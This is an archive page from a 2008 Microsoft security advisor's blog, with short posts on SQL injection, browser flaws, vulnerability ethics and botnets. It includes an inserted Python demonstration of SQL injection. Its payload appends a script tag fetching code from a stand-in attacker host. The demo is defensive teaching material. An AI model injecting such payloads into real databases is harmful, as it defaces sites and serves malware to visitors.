
Roger's Security Blog

I am Microsoft's Chief Security Advisor for Europe, the Middle East and Africa, and this blog is mainly about information security.

Articles

Security Compliance Management: Solution Accelerator Available
2008-06-07 15:16:00
I wrote about it when we released the Beta. Now the Solution Accelerator for Security Compliance Management is live and available. It is definitely worth a look: Security Compliance Management. To quote from the web page: In today's IT environment, the ability to comply with regulations and industry standards, such as the Sarbanes Oxley Act, is a source of deep concern for many organizations. In addition, organizations need to manage risks resulting from emerging threats and changing conditions within their IT infrastructures. As a result, organizations need sound methods that they can count on to understand the state of the security settings in their IT infrastructures, assess the compliance of a security baseline, and demonstrate that compliance requirements have been met. To help organizations address these challenges, Microsoft has created the Security Compliance Management toolkit. The toolkit provides best practices from Microsoft about how to plan, deploy, and moni...
The Emancipation of Hackers
2008-06-04 16:00:00
In the world of Chinese hackers there seems to be a group especially for female hackers. I just read this post: Chinese Female Hacker Group, which shows a pretty high growth rate of women joining: The website for the China Girl Security Team was registered on 12 Mar 2007 and currently has 2,217 members. The leader of the group, Xiao Tian, is only 19 years old. Roger
More About: Cybercrime
On-Premise vs. On-Demand (or SaaS): A Quocirca Report
2008-06-04 09:00:00
I was made aware of a pretty good report on Software as a Service that Quocirca produced in collaboration with Microsoft. It is not the kind of "new, what you never heard before" thing, but I personally think that it is a good investment of time to get an overview of Software as a Service and some additional views and thoughts on it. The report can be found here: On-premise and on-demand. You have to go through a free registration in order to get access to the full report. Roger
More About: Technology , Trends , Report , SAAS , Demand
Windows Server 2008 PKI and Certificate Security
2008-06-03 20:01:00
Fresh off the press (ok, it has been out since the beginning of April, but I only saw it now): Brian Komar, the well-known author of several PKI books on Windows Server, just released a new book called Windows Server 2008 PKI and Certificate Security. If you are planning a Windows Server 2008 PKI, this is a must-read (at least judging by Brian's earlier books). Here is the abstract: Get in-depth guidance for designing and implementing certificate-based security solutions, straight from PKI expert Brian Komar. No need to buy or outsource costly PKI services when you can use the robust PKI and certificate-based security services already built into Windows Server 2008! This in-depth reference teaches you how to design and implement even the most demanding certificate-based security solutions for wireless networking, smart card authentication, VPNs, secure email, Web SSL, EFS, and code-signing applications using Windows Server PKI and certificate services. A principal PKI consultant to Microsoft, Brian sho...
More About: Technology
Service Oriented Architecture and the Security Implications
2008-06-03 11:53:00
I was just posting on SOA and its security implications from a CIO/CSO perspective on my other blog. If you are interested, here is the link. Roger
More About: Architecture , Trends , Service , Processes
The "successful" attack on CardSpace
2008-06-02 09:38:00
I guess you have read it, as it was pretty widespread in the press in the last few days: On the Insecurity of Microsoft's Identity Metasystem CardSpace. Well, is there any official Microsoft reaction to it? No, not yet, and if you look a little more in depth into it, I doubt that there will be. Why? Because the whole setup is ridiculous, at least in my opinion. To cut it short: if you ignore all the warnings of the OS and pull down all the protection shields we built into Windows Vista, then it is possible to attack CardSpace. This is true. Is it making me nervous? Not really. There are mainly two things that you have to do to make the attack successful before you can steal the CardSpace token: spoof DNS and "compromise" the Root Certificate Store. Hmm, we all know that attacking DNS could be possible (even though they do not include it in their presentation); you need the help of the user as well in order to get a certificate into the Trusted Root store or trick a Certificate Prov...
More About: Security , Technology , Attack
New Guidance on the SQL Injection Attacks
2008-05-31 11:23:00
We just published yesterday two new pieces of guidance for the latest SQL Injection attacks, which I want to make sure you saw: Preventing SQL Injections in ASP, and SQL Injection Attack, which is a great piece of work pulling the different views of the latest attacks together. Roger
More About: Technology , Attacks
Microsoft Advisory for Safari Flaw
2008-05-31 11:19:00
I posted yesterday on the Safari flaw (Why Apple has to fix the Safari flaw), as Apple did not acknowledge that this is a security vulnerability. Unfortunately we now had to release an advisory for this, as we started to see that the bad guys could use this "feature" to attack machines; we are calling it a blended threat. I just wanted to make sure you saw it: Microsoft Security Advisory (953818) - Blended Threat from Combined Attack Using Apple's Safari on the Windows Platform. Roger
More About: Technology , Cybercrime
The latest SQL Injection Attacks
2008-05-30 09:39:00
Well, there was quite some chatter over the last few weeks with regard to the massive defacements we saw based on SQL Injection Attacks. So, what was really new? Close to nothing. Well, this is not completely true. The new thing we have seen with these attacks is automation; however, a lot of people did not really start with this at the beginning. Just as an example, The Washington Post published an article called Hundreds of Thousands of Microsoft Web Servers Hacked and said: Hundreds of thousands of Web sites [...] have been hacked recently and seeded with code that tries to exploit security flaws in Microsoft Windows to install malicious software on visitors' machines. Whereas the first part was true (though "just" giving a wrong impression), the content of the article was definitely wrong, as it was (and still is) not a Windows or IIS vulnerability but simply bad programming: untrusted request input concatenated into SQL statements. What we see are tools that use Google to find web applications with potential SQL Injection vulnerabilities and then tr...
More About: Security , Technology , Processes
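The two SQL injection posts above (the ASP guidance and the mass defacements) both come down to the same coding defect: a request value pasted into the SQL text. The following Python example is added here and is not from Roger's posts or from the Microsoft guidance; it uses SQLite in place of SQL Server, a constructed product table and a constructed script payload, to show how a concatenated UPDATE lets one request parameter rewrite a column that the site later renders into every page, and why the same input sent as a bind parameter cannot become SQL.

```python
import sqlite3

# Constructed payload: the mass defacements appended a script tag to text
# columns so that every page rendering that column pulled attacker JavaScript.
SCRIPT_TAG = '<script src="http://attacker.invalid/x.js"></script>'


def make_db():
    """Constructed sample catalogue; 'description' is rendered into web pages."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, "
        "description TEXT, rating INTEGER DEFAULT 0)"
    )
    con.executemany(
        "INSERT INTO products (name, description) VALUES (?, ?)",
        [("widget", "A useful widget."), ("gadget", "A shiny gadget.")],
    )
    con.commit()
    return con


def rate_vulnerable(con, product_id, rating):
    """Classic ASP/ADO style: request values pasted straight into the SQL text.

    Nothing here is a Windows, IIS or database vulnerability; the application
    simply lets the client decide where its SQL statement ends.
    """
    sql = f"UPDATE products SET rating = {rating} WHERE id = {product_id}"
    con.execute(sql)
    con.commit()


def rate_parameterized(con, product_id, rating):
    """Hardened version: values travel as bind parameters, never as SQL text."""
    con.execute(
        "UPDATE products SET rating = ? WHERE id = ?",
        (rating, product_id),
    )
    con.commit()


def get_description(con, product_id):
    row = con.execute(
        "SELECT description FROM products WHERE id = ?", (product_id,)
    ).fetchone()
    return row[0]


def get_rating(con, product_id):
    row = con.execute(
        "SELECT rating FROM products WHERE id = ?", (product_id,)
    ).fetchone()
    return row[0]


def demo():
    """Run the same hostile 'rating' through both code paths.

    Returns (description after the vulnerable call, description after the
    parameterized call, what the parameterized call stored as the rating).
    """
    # The attacker's rating closes the intended assignment and adds a second
    # one, concatenating the script tag onto the rendered description.
    payload = f"5, description = description || '{SCRIPT_TAG}'"

    vulnerable = make_db()
    rate_vulnerable(vulnerable, 1, payload)

    hardened = make_db()
    rate_parameterized(hardened, 1, payload)

    return (
        get_description(vulnerable, 1),
        get_description(hardened, 1),
        get_rating(hardened, 1),
    )


if __name__ == "__main__":
    defaced, intact, stored = demo()
    print("vulnerable path:", defaced)
    print("parameterized path:", intact)
    print("rating stored by parameterized path:", repr(stored))
```

On the parameterized path the whole payload lands in the rating column as an opaque value (SQLite stores it as text; SQL Server would raise a conversion error for a non-numeric rating), and the description is untouched. Type validation of the rating is still worthwhile, but it is the bind parameter, not the validation, that keeps client input from ever being parsed as SQL, which is also what denies an attacker the stacked statements the automated tools relied on.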
Why Apple has to fix the Safari flaw
2008-05-30 09:19:00
Remember my post "Is Security Research Ethical?" I made a statement in there when it comes to responsible disclosure of vulnerabilities: And then, what does the vendor do with it? Does the company act on it? Now, we can debate what is a vulnerability and what is not. Personally I am convinced that a vendor should be transparent about when it treats a bug as a vulnerability and when not. There is actually a good essay by Scott Culp about this called Definition of a Security Vulnerability. Why am I telling you this? Well, there seems to be a disagreement between Apple and the rest of the world about whether Safari's Carpet Bombing flaw is a security vulnerability or not. Robert Hensing already posted on that last week (Safari "carpet bombing" Fail Open Goat Award) and ZDNet took it up yesterday as well (Why Apple must fix Safari 'carpet bombing' flaw immediately). And I quote: [...] but when it comes to responding to legitimate security threats, Apple is light years away from living up to the ...
More About: Technology
How to sell security
2008-05-27 11:45:00
I just read this essay by Bruce Schneier: How to Sell Security. This is definitely a must-read in my opinion. Not that it really tells you how to sell it, but it helps you to understand the "mechanics" of it. Roger
More About: Processes
How to Hack Windows Vista
2008-05-27 06:45:00
No, no. For sure, I am not going to give you advice on how to hack, but look at this video: http://www.offensive-security.com/movies/vistahack/vistahack.html. I am always amazed that these kinds of videos still surprise people. If you look back a few years, we published the 10 Immutable Laws of Security, which contains Law #3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore. The hack shown above needs physical access. But if you want to protect Windows Vista from these kinds of physical attacks, why do you not just switch on BitLocker (and here on TechNet)? If you switch it on (with a PIN or startup key rather than TPM-only mode if the attacker can also boot the machine), the system volume can no longer be tampered with offline and this attack would fail. And it is part of the OS: no additional fees, nothing. Roger
More About: Windows Vista , Hack
Two Important Whitepapers on Windows Server 2008
2008-05-26 16:52:00
If you are planning to implement Windows Server 2008, two papers were recently published that could help you with it: Active Directory Certificate Services Upgrade and Migration Guide, and Configuring and Troubleshooting Certification Authority Clustering in Windows Server 2008. Roger
More About: Processes
Researcher at Microsoft Research wins ACM award for Privacy Protection
2008-05-26 08:29:00
I just read this article: Cryptography Expert Wins ACM Award for Advances in Protecting Privacy of Information Retrieval. It is really cool to see that the research we do at Microsoft Research leads not "only" to advancements in our products but to public recognition as well. Well done Sergey! Roger
More About: Microsoft Research
SANS Commits $1 Million to Fight Cybercrime in Developing Countries
2008-05-24 16:25:00
You know that I criticize SANS from time to time. Especially when it comes to their handlers, I am convinced that they are creating the problem rather than solving it. This time I have to say that I am impressed, as they are helping developing countries fight cybercrime. This is the "we are all in this together" spirit. As I often say, we have to collaborate and build partnerships in order to fight the criminals. Read the announcement by SANS: SANS Institute Commits $1 Million for Joint Cyber Defence Program with International Multilateral Partnership Against Cyber-Terrorism (IMPACT). Roger
More About: Fight , Countries
Adding additional File Formats in Office 2007 SP2
2008-05-22 21:31:00
We just announced that we will add support for additional file formats in Office System 2007 SP2. Read more at Open XML, ODF, PDF, and XPS in Office. Roger
More About: File , Office 2007
Is Security Research Ethical?
2008-05-22 15:26:00
Shoaib's blog pointed me to a pretty interesting article called Face-Off: Is vulnerability research ethical? - Security Experts Bruce Schneier & Marcus Ranum Offer Their Opposing Points of View. Not surprisingly, Bruce says "yes" and Marcus says "no". If you read through their points, you might even partly agree with each of them. Bruce Schneier: Yes, newly discovered vulnerabilities in software and airports put us at risk, but they also give us more realistic information about how good the security actually is. And yes, there are more and less responsible--and more and less legal--ways to handle a new vulnerability. But the bad guys are constantly searching for new vulnerabilities, and if we have any hope of securing our systems, we need the good guys to be at least as competent. Marcus Ranum: Trust model? What's that? The so-called vulnerability "researchers" are already sharpening their knives for the coming feast. If we were really interested in making software mo...
More About: Research , Policy
Analysis of the Estonian Attacks
2008-05-21 18:25:00
I just read a paper on the political analysis of the Estonian attacks. If you are interested, read my post on my other blog (the analysis is not really technical, but interesting): Analysis of the Estonian Attacks. Roger
More About: Terrorism , Law Enforcement , Cybercrime
Do you know about PDOS?
2008-05-21 15:04:00
Well, I know DOS, I know DDOS, but I never knew PDOS until today: there seems to be a new way to attack systems using the firmware update mechanism and generating a Permanent Denial of Service (actually damaging the hardware). I was involved in a Critical Infrastructure Protection workshop about two years ago, and one of the base scenarios we looked at was a worm that damages hardware. One of the big (very big) hardware vendors then told us that we could play this silly game but that this scenario was completely unlikely. Judge for yourself: Permanent Denial-of-Service Attack Sabotages Hardware. Roger
More About: Trends , Cybercrime
Security Risks of Virtualization
2008-05-21 05:51:00
One fact strikes me pretty often: companies have the problem that they have legacy software running on legacy operating systems (e.g. NT4) running on legacy hardware. This is a severe problem, as you all know. Now, these companies look into virtualization to solve this problem. Of the three "legacy" layers up there, only the hardware problem can be addressed by the use of virtualization, definitely not the OS and the application piece (obviously). Still, there are a lot of people thinking that if they embed the legacy machine in a state-of-the-art virtual environment, the machine itself might be more secure. This can be true, if you do not connect it to the network. Otherwise, the OS and the application are as vulnerable as before. This is all clear and in the meantime known to a lot of people. Virtualization gives us a lot. I think it is a great technology to address quite some challenges (especially the challenge of having servers that are mainly idling in the computer r...
More About: Security , Technology
Learnings on Publishing SharePoint on ISA Server
2008-05-20 20:39:00
In Blogging on MOSS 2007 (SharePoint) I talked about the way I use SharePoint and a CodePlex application to build a blog. Shoaib was so kind to let me know that the links in the RSS feed point to the internal server rather than the public URL. If you are interested in the findings, what happened and what I had to do to fix it, read here. Roger
More About: Technology , Publishing , Server , Sharepoint
Storm coming back?
2008-05-20 14:17:00
I just read the first reports that Storm is coming back as we speak. This is frightening, but shows the power and possibilities of the criminals as well. I have no information yet on how bad it is; just read the following report: The Storm Worm would love to infect you. Roger
More About: Back , Cybercrime
Selling Vulnerabilities and Ethics
2008-05-18 21:19:00
Shoaib just blogged on Hacking & Security Community - Ethical or Unethical?. To start with: I do not claim that I know all about ethics or that there is only one view on ethics, but I have a clear view on certain things. I have blogged on this theme several times already and made my points pretty clear: Vulnerability Auction; Selling Vulnerabilities: WabiSabiLabi and their view on ethics. When I talk to people who are selling vulnerabilities, they keep telling me that it is their right to sell their work, as they do vulnerability research for a living. So, let's use an analogy: how ethical would it be to look for ways to break into my house and then sell them to the highest bidder, who will then offer me services to protect me? Is this ethical? Not from my perspective. If I hired somebody to look for these vulnerabilities, this would be a different game, but I would then want to know them without going public. WabiSabiLabi tells us that they will not sell to the...
More About: Ethics , Cybercrime
The Best Security Blogs on the Web
2008-05-17 21:25:00
Well, this is not what I am claiming to have. This is what I am looking for. At the moment, I am monitoring/reading the following security-related blogs (sorted alphabetically): Microsoft BitLocker Drive Encryption Team Blog, Chief Security Advisor Finland (in Finnish), Chief Security Advisor Italy (in Italian), Chief Security Advisor Switzerland (in English), Chief Security Advisor Russia (in Russian), Gerhard's Marktbeobachtungen (in German), Jeff Jones' Security Blog, Kim Cameron's Identity Weblog, Mark Russinovich's Blog, Michael Howard's Web Log, Microsoft Application Threat Modeling Blog, Microsoft Forefront codenamed "Stirling" Team Blog, Microsoft Security Response Center, Security by Numbers, Security Vulnerability Research & Defense, Steve Riley on Security, The Security Development Lifecycle, Windows Vista Security; Vendors: Errata Security, David Litchfield's Weblog, Forrester Blog on Security, F-Secure, Google Online Security Blog, iDef...
More About: Blogs
Schneier on US Customs Notebook Searches: Do not follow the rules
2008-05-16 08:34:00
I just read this article by Bruce Schneier on what to do about US Customs searches: Taking your laptop into the US? Be sure to hide all your data first. Part of his recommendations are: You're going to have to hide your data. Set a portion of your hard drive to be encrypted with a different key - even if you also encrypt your entire hard drive - and keep your sensitive data there. [...] consider putting your sensitive data on a USB drive or even a camera memory card: even 16GB cards are reasonably priced these days. Encrypt it, of course, because it's easy to lose something that small. Slip it in your pocket, and it's likely to remain unnoticed even if the customs agent pokes through your laptop. If someone does discover it, you can try saying: "I don't know what's on there. My boss told me to give it to the head of the New York office." If you've chosen a strong encryption password, you won't care if he confiscates it. So, if you look at the two recomme...
More About: Notebook , Policy , Rules , Cybercrime
Support for Law Enforcement and COFEE
2008-05-14 16:00:00
Over the last few weeks there has been a lot of chatter about a tool we provide in a Beta version to Law Enforcement called COFEE: Computer Online Forensic Evidence Extractor. Let me give you some information on COFEE and put it into the proper context. I am personally convinced that every company has an obligation to work towards making the Internet a safer place. Amongst other things, this means close collaboration with Law Enforcement. Let's face it: most of security is about crime prevention! Now, Microsoft has a team internally working with Law Enforcement running different programs: Anti-Phishing Efforts: you know of the Internet Explorer 7 Phishing Filter. Additionally we are a founding member of the Digital PhishNet. Anti-Spam Efforts: again, besides technology we have been a leader in promoting Signal Spam, a unique public/private partnership in Europe and probably in the world. Legislative Efforts: one of the key challenges in fighting cybercrime is that most of t...
More About: Trends , Support , Cybercrime
Bug Hidden for more than 25 Years
2008-05-14 09:25:00
Wow, this was impressive: a Swiss developer posted on Saturday that he found a bug which had remained hidden for more than 25 years: When seekdir() Won't Seek to the Right Position. BTW: it is in BSD, where the code is available to everyone, and as I am told on most of the panels I sit on, Open Source is more secure because the bugs are found very fast by the community... I do not want to pick on Open Source, but it would probably be a good time to stop picking on us and get their own house in order first. Roger
More About: Technology , Years , Hidden , Processes
More than a third of software is stolen
2008-05-14 08:36:00
BSA just released a new piracy study today, and there are some remarkable facts in there: the worldwide weighted average piracy rate is 38%; the median piracy rate in 2007 is 61%. Think about the second point for a second: this means that in half of the countries they studied, the piracy rate is 61% or higher. 61% of the software is stolen, and people are using stolen software and making money out of it. For you, this would mean the following: it is Wednesday today. So from now until the end of the week you deliver your work but do not get paid for it! People simply steal the rest of your week. Amazing, isn't it? It even gets worse: the piracy rate ranges from around 20% (so, this is the lowest figure on the globe) in countries like the US, Luxembourg, New Zealand, Japan, ... to more than 90% in Sri Lanka, Zimbabwe, Moldova, Azerbaijan, Bangladesh, Armenia. What does this mean from a security perspective? I would love to see a study on how these users patch their machines. As we h...
More About: Software , Trends , Stolen , Cybercrime
Opening a File (Dilbert)
2008-05-12 17:49:00
Ever tried to open a file? Roger
More About: File , Opening , Dilbert
What a Botnet looks like
2008-05-09 10:04:00
If you would like to know a little more about botnets and what they actually look like, there is a researcher who drew a map of one: What a Botnet Looks Like. Roger


© Blog Toplist 2009 - Supported by Web Catalog - SEO by FeWorks